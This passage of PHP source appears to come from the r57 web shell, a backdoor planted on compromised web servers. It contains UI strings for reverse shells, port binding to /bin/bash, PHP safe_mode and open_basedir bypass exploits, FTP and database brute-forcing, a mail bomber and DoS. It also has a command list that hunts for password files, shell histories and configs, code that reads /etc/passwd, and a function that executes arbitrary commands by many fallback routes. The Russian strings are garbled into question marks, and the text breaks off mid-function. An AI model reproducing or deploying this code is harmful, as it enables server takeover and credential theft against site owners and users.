'ru_text97'=>'????????? ??????????: ', 'ru_text98'=>'??????? ???????????: ', 'ru_text99'=>'/etc/passwd', 'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????', 'ru_text101'=>'???????????? (user -> resu)', 'ru_text102'=>'?????', 'ru_text103'=>'???????? ??????', 'ru_text104'=>'???????? ????? ?? ???????? ????', 'ru_text105'=>'????', 'ru_text106'=>'??', 'ru_text107'=>'????', 'ru_text108'=>'????? ??????', 'ru_text109'=>'????????', 'ru_text110'=>'??????????', 'ru_text111'=>'SQL-?????? : ????', 'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)', 'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list() (PHP <= 5.1.2)', 'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body() (PHP <= 5.1.2)', 'ru_text115'=>'???????? ??????????? ?????? ??????????? safe_mode, ??????????? ?????? ? [compress.zlib://] (PHP <= 4.4.2, 5.1.2)', 'ru_text116'=>'?????????? ????', 'ru_text117'=>'?', 'ru_text118'=>'???? ??????????', 'ru_text119'=>'?? ??????? ??????????? ????', 'ru_text120'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? ini_restore() (PHP <= 4.4.4, 5.1.6) by NST', 'ru_text121'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ?????????????? fopen() (PHP v4.4.0 memory leak) by NST', 'ru_text122'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ?????????????? glob() (PHP <= 5.2.x)', 'ru_text123'=>'???????? ??????????? ?????? ??????????? open_basedir, ?????? *.bzip ?????? [compress.bzip2://] (PHP <= 5.2.1)', 'ru_text124'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ?????? ? error_log(php://) (PHP <= 5.1.4, 4.4.2)', 'ru_text125'=>'??????', 'ru_text126'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ????? ?????? ? ???????[NULL-byte] (PHP <= 5.2.0)', 'ru_text127'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ?????? ? readfile(php://) (PHP <= 5.2.1, 4.4.4)', 'ru_text128'=>'???? ?????????/??????? ????? (touch)', 'ru_text129'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ????? ? fopen(srpath://) (PHP v5.2.0)', 'ru_text130'=>'???????? ??????????? ?????? ??????????? open_basedir, ?????? *.zip ?????? [zip://] (PHP <= 5.2.1)', 'ru_text131'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ??????????? ????? ? ?????????????? symlink() (PHP <= 5.2.1)', 'ru_text132'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ?????????????? symlink() (PHP <= 5.2.1)', 'ru_text133'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ????? ?????? ? ???????(TMPDIR) (PHP <= 5.2.4)', 'ru_text134'=>'???????? ??? ??????', 'ru_text135'=>'???????', 'ru_text136'=>'???????? ?????????? ??????', 'ru_text137'=>'????????', 'ru_text138'=>'???????', 'ru_text139'=>'????-??????', 'ru_text140'=>'DoS', 'ru_text141'=>'?????????! ???????? ???? ???-???????.', 'ru_text142'=>'????????? ???????', 'ru_text143'=>'Temp: ', 'ru_text144'=>'Test bypass safe_mode with load file in mysqli', 'ru_text145'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ?????????????? realpath() (PHP <= 5.2.4)', 'ru_text146'=>'MAX ???-?? ????????', 'ru_text147'=>'', 'ru_text148'=>'', 'ru_text149'=>'', 'ru_text150'=>'', 'ru_err0'=>'??????! ?? ???? ???????? ? ???? ', 'ru_err1'=>'??????! ?? ???? ????????? ???? ', 'ru_err2'=>'??????! ?? ??????? ??????? ', 'ru_err3'=>'??????! ?? ??????? ???????????? ? ftp ???????', 'ru_err4'=>'?????? ??????????? ?? ftp ???????', 'ru_err5'=>'??????! ?? ??????? ???????? ?????????? ?? ftp ???????', 'ru_err6'=>'??????! ?? ??????? ????????? ??????', 'ru_err7'=>'?????? ??????????', /* --------------------------------------------------------------- */ 'eng_butt1' =>'Execute', 'eng_butt2' =>'Upload', 'eng_butt3' =>'Bind', 'eng_butt4' =>'Connect', 'eng_butt5' =>'Run', 'eng_butt6' =>'Change', 'eng_butt7' =>'Show', 'eng_butt8' =>'Test', 'eng_butt9' =>'Dump', 'eng_butt10'=>'Save', 'eng_butt11'=>'Edit file', 'eng_butt12'=>'Find', 'eng_butt13'=>'Create/Delete', 'eng_butt14'=>'Download', 'eng_butt15'=>'Send', 'eng_text1' =>'Executed command', 'eng_text2' =>'Execute command on server', 'eng_text3' =>'Run command', 'eng_text4' =>'Work directory', 'eng_text5' =>'Upload files on server', 'eng_text6' =>'Local file', 'eng_text7' =>'Aliases', 'eng_text8' =>'Select alias', 'eng_text9' =>'Bind port to /bin/bash', 'eng_text10'=>'Port', 'eng_text11'=>'Password for access', 'eng_text12'=>'back-connect', 'eng_text13'=>'IP', 'eng_text14'=>'Port', 'eng_text15'=>'Upload files from remote server', 'eng_text16'=>'With', 'eng_text17'=>'Remote file', 'eng_text18'=>'Local file', 'eng_text19'=>'Exploits', 'eng_text20'=>'Use', 'eng_text21'=>' New name', 'eng_text22'=>'datapipe', 'eng_text23'=>'Local port', 'eng_text24'=>'Remote host', 'eng_text25'=>'Remote port', 'eng_text26'=>'Use', 'eng_text28'=>'Work in safe_mode', 'eng_text29'=>'ACCESS DENIED', 'eng_text30'=>'Cat file', 'eng_text31'=>'File not found', 'eng_text32'=>'Eval PHP code', 'eng_text33'=>'Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)', 'eng_text34'=>'Test bypass safe_mode with include function', 'eng_text35'=>'Test bypass safe_mode with load file in mysql', 'eng_text36'=>'Database . Table', 'eng_text37'=>'Login', 'eng_text38'=>'Password', 'eng_text39'=>'Database', 'eng_text40'=>'Dump database table', 'eng_text41'=>'Save dump in file', 'eng_text42'=>'Edit files', 'eng_text43'=>'File for edit', 'eng_text44'=>'Can't edit file! Only read access!', 'eng_text45'=>'File saved', 'eng_text46'=>'Show phpinfo()', 'eng_text47'=>'Show variables from php.ini', 'eng_text48'=>'Delete temp files', 'eng_text49'=>'Delete script from server', 'eng_text50'=>'View cpu info', 'eng_text51'=>'View memory info', 'eng_text52'=>'Find text', 'eng_text53'=>'In dirs', 'eng_text54'=>'Find text in files', 'eng_text55'=>'Only in files', 'eng_text56'=>'Nothing :(', 'eng_text57'=>'Create/Delete File/Dir', 'eng_text58'=>'name', 'eng_text59'=>'file', 'eng_text60'=>'dir', 'eng_text61'=>'File created', 'eng_text62'=>'Dir created', 'eng_text63'=>'File deleted', 'eng_text64'=>'Dir deleted', 'eng_text65'=>'Create', 'eng_text66'=>'Delete', 'eng_text67'=>'Chown/Chgrp/Chmod', 'eng_text68'=>'Command', 'eng_text69'=>'param1', 'eng_text70'=>'param2', 'eng_text71'=>"Second commands param is:rn- for CHOWN - name of new owner or UIDrn- for CHGRP - group name or GIDrn- for CHMOD - 0777, 0755...", 'eng_text72'=>'Text for find', 'eng_text73'=>'Find in folder', 'eng_text74'=>'Find in files', 'eng_text75'=>'* you can use regexp', 'eng_text76'=>'Search text in files via find', 'eng_text80'=>'Type', 'eng_text81'=>'Net', 'eng_text82'=>'Databases', 'eng_text83'=>'Run SQL query', 'eng_text84'=>'SQL query', 'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', 'eng_text86'=>'Download files from server', 'eng_text87'=>'Download files from remote ftp-server', 'eng_text88'=>'server:port', 'eng_text89'=>'File on ftp', 'eng_text90'=>'Transfer mode', 'eng_text91'=>'Archivation', 'eng_text92'=>'without arch.', 'eng_text93'=>'FTP', 'eng_text94'=>'FTP-bruteforce', 'eng_text95'=>'Users list', 'eng_text96'=>'Can't get users list', 'eng_text97'=>'checked: ', 'eng_text98'=>'success: ', 'eng_text99'=>'/etc/passwd', 'eng_text100'=>'Send file to remote ftp server', 'eng_text101'=>'Use reverse (user -> resu)', 'eng_text102'=>'Mail', 'eng_text103'=>'Send email', 'eng_text104'=>'Send file to email', 'eng_text105'=>'To', 'eng_text106'=>'From', 'eng_text107'=>'Subj', 'eng_text108'=>'Mail', 'eng_text109'=>'Hide', 'eng_text110'=>'Show', 'eng_text111'=>'SQL-Server : Port', 'eng_text112'=>'Test bypass safe_mode with function mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)', 'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list() (PHP <= 5.1.2)', 'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body() (PHP <= 5.1.2)', 'eng_text115'=>'Test bypass safe_mode, copy file via copy(compress.zlib://) (PHP <= 4.4.2, 5.1.2)', 'eng_text116'=>'Copy from', 'eng_text117'=>'to', 'eng_text118'=>'File copied', 'eng_text119'=>'Cant copy file', 'eng_text120'=>'Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST', 'eng_text121'=>'Test bypass open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST', 'eng_text122'=>'Test bypass open_basedir, view dir list via glob() (PHP <= 5.2.x)', 'eng_text123'=>'Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)', 'eng_text124'=>'Test bypass open_basedir, add data to file via error_log(php://) (PHP <= 5.1.4, 4.4.2)', 'eng_text125'=>'Data', 'eng_text126'=>'Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)', 'eng_text127'=>'Test bypass open_basedir, add data to file via readfile(php://) (PHP <= 5.2.1, 4.4.4)', 'eng_text128'=>'Modify/Access file (touch)', 'eng_text129'=>'Test bypass open_basedir, create file via fopen(srpath://) (PHP v5.2.0)', 'eng_text130'=>'Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)', 'eng_text131'=>'Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1)', 'eng_text132'=>'Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1)', 'eng_text133'=>'Test bypass open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)', 'eng_text134'=>'Database-bruteforce', 'eng_text135'=>'Dictionary', 'eng_text136'=>'Creating evil symlink', 'eng_text137'=>'Useful', 'eng_text138'=>'Dangerous', 'eng_text139'=>'Mail Bomber', 'eng_text140'=>'DoS', 'eng_text141'=>'Danger! Web-daemon crash possible.', 'eng_text142'=>'Downloaders', 'eng_text143'=>'Temp: ', 'eng_text144'=>'Test bypass safe_mode with load file in mysqli', 'eng_text145'=>'Test bypass open_basedir, view dir list via realpath() (PHP <= 5.2.4)', 'eng_text146'=>'Max Interation', 'eng_text147'=>'', 'eng_text148'=>'', 'eng_text149'=>'', 'eng_text150'=>'', 'eng_err0'=>'Error! Can't write in file ', 'eng_err1'=>'Error! Can't read file ', 'eng_err2'=>'Error! Can't create ', 'eng_err3'=>'Error! Can't connect to ftp', 'eng_err4'=>'Error! Can't login on ftp server', 'eng_err5'=>'Error! Can't change dir on ftp', 'eng_err6'=>'Error! Can't sent mail', 'eng_err7'=>'Mail send', ); /* ?????? ?????? ????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? ) ?? ?????? ???? ????????? ??? ???????? ???????. */ $aliases=array( '----------------------------------locate'=>'', 'locate httpd.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate httpd.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate vhosts.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate vhosts.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate proftpd.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate proftpd.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate psybnc.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate psybnc.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate my.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate my.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate admin.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate admin.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate cfg.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate cfg.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate conf.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate conf.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate config.dat files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.dat >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate config.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate config.inc files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.inc >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate config.inc.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.inc.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate config.default.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.default.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate .conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".conf" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate .pwd files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".pwd" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate .sql files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".sql" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate .htpasswd files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".htpasswd" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate .bash_history files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".bash_history" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate .mysql_history files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".mysql_history" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate backup files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate backup >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate dump files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate dump >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate priv files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate priv >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', '----------------------------------tar'=>'', 'tar -czvf all.tgz -T '.$tempdir.'grep.txt'=>'tar -czvf all.tgz -T '.$tempdir.'grep.txt', '----------------------------------1'=>'', 'locate auth_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate auth_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate access_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate access_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate error_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate error_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate auth.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate auth.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate access.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate access.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate error.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate error.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate ".log" files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".log" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', '----------------------------------2'=>'', 'cat /var/log/httpd/auth_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/auth_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt', 'cat /var/log/httpd/access_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/access_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt', 'cat /var/log/httpd/error_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/error_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt', 'cat /var/log/httpd/auth.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/auth.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt', 'cat /var/log/httpd/access.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/access.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt', 'cat /var/log/httpd/error.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/error.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt', '----------------------------------find'=>'', 'find suid files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -perm -04000 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find suid files in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -type f -perm -04000 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find sgid files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -perm -02000 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find sgid files in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -type f -perm -02000 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find all writable files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find all writable files in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -type f -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find all writable directories >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type d -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find all writable directories in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -type d -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find all writable directories and files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find all writable directories and files in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find all .htpasswd files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name .htpasswd >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find all .bash_history files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name .bash_history >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find all .mysql_history files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name .mysql_history >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find all .fetchmailrc files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name .fetchmailrc >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find httpd.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name httpd.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find vhosts.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name vhosts.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find proftpd.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name proftpd.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find admin.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name admin.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find config* files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "config*" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find cfg.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name cfg.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find conf.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name conf.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find config.dat files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.dat >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find config.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find config.inc files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.inc >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find config.inc.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.inc.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find config.default.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.default.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find *.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*.conf" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find *.pwd files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*.pwd" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find *.sql files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*.sql" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find *backup* files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*backup*" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find *dump* files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*dump*" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', '-----------------------------------'=>'', 'find /var/ auth_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name auth_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find /var/ access_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name access_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find /var/ error_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name error_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find /var/ auth.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name auth.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find /var/ access.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name access.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find /var/ error.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name error.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find /var/ "*_log" files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name "*.log" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find /var/ "*.log" files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name "*.log" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', '----------------------------------------------------------------------------------------------------'=>'ls -la' ); $table_up1 = "

:: "; $table_up2 = " ::

"; $table_up3 = ""; $arrow = " 4"; $lb = "["; $rb = "]"; $font = ""; $ts = ""; $te = ""; $fs = ""; $fe = ""; if(isset($_GET['users'])) { if(!$users=get_users('/etc/passwd')) { echo "".$lang[$language.'_text96'].""; } else { echo ''; foreach($users as $user) { echo $user."
"; } echo ''; } echo "
[ BACK ]"; die(); } if (!empty($_POST['dir'])) { if(@function_exists('chdir')){@chdir($_POST['dir']);} else if(@function_exists('chroot')){ @chroot($_POST['dir']);}; } if (empty($_POST['dir'])){if(@function_exists('chdir')){$dir = @getcwd();};}else{$dir=$_POST['dir'];} $unix = 0; if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1; if(empty($dir)) { $os = getenv('OS'); if(empty($os)){ $os = @php_uname(); } if(empty($os)){ $os ="-"; $unix=1; } else { if(@eregi("^win",$os)) { $unix = 0; } else { $unix = 1; } } } if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") { echo $head; if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } $sr->SearchText(0,0); $res = $sr->GetResultFiles(); $found = $sr->GetMatchesCount(); $titles = $sr->GetTitles(); $r = ""; if($found > 0) { $r .= ""; foreach($res as $file=>$v) { $r .= ""; $r .= ""; foreach($v as $a=>$b) { $r .= ""; $r .= ""; $r .= ""; $r .= "n"; } } $r .= ""; echo $r; } else { echo "".$lang[$language.'_text56'].""; } echo "[ BACK ]"; die(); } /*if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }*/ if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }else{$safe_mode = 0;} $SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } function ws($i) { return @str_repeat(" ",$i); } function ex($cfe) {global $unix,$tempdir; $res = ''; if (!empty($cfe)) { if(@function_exists('exec')) { @exec($cfe,$res); $res = join("n",$res); } elseif(@function_exists('shell_exec')) { $res = @shell_exec($cfe); } elseif(@function_exists('system')) { @ob_start(); @system('$cfe'); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@function_exists('popen') && @is_resource($f = @popen($cfe,"r"))) { $res = ""; if(@function_exists('fread') && @function_exists('feof')){ while(!@feof($f)) { $res .= @fread($f,1024); } }else if(@function_exists('fgets') && @function_exists('feof')){ while(!@feof($f)) { $res .= @fgets($f,1024); } } @pclose($f); } elseif(@function_exists('proc_open') && @is_resource($f = @proc_open($cfe,array(1 => array("pipe", "w")),$pipes))) { $res = ""; if(@function_exists('fread') && @function_exists('feof')){ while(!@feof($pipes[1])) {$res .= @fread($pipes[1], 1024);} }else if(@function_exists('fgets') && @function_exists('feof')){ while(!@feof($pipes[1])) {$res .= @fgets($pipes[1], 1024);} } @proc_close($f); } }else{$res = safe_ex($cfe);} return htmlspecialchars($res); } function safe_ex($cfe) {global $unix,$tempdir; $res = ''; if (!empty($cfe)) { if(extension_loaded('perl')){ @ob_start(); $safeperl=new perl(); $safeperl->eval("system('$cfe')"); $res = @ob_get_contents(); @ob_end_clean(); } elseif(!$unix && extension_loaded('ffi')) { $output=$tempdir.uniqid('NJ'); $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);"); if(!@function_exists('escapeshellarg')){$res=$api->WinExec("cmd.exe /c $cfe >"$output"",0);} else{$res=$api->WinExec("cmd.exe /c ".@escapeshellarg($cfe)." >"$output"",0);} while(!@file_exists($output))sleep(1); $res=moreread($output); @unlink($output); } elseif(!$unix && extension_loaded('win32service')) { $output=$tempdir.uniqid('NJ'); $n_ser=uniqid('NJ'); if(!@function_exists('escapeshellarg')) {@win32_create_service(array('service'=>$n_ser,'display'=>$n_ser,'path'=>'c:\windows\system32\cmd.exe','params'=>"/c $cfe >"$output""));} else{@win32_create_service(array('service'=>$n_ser,'display'=>$n_ser,'path'=>'c:\windows\system32\cmd.exe','params'=>"/c 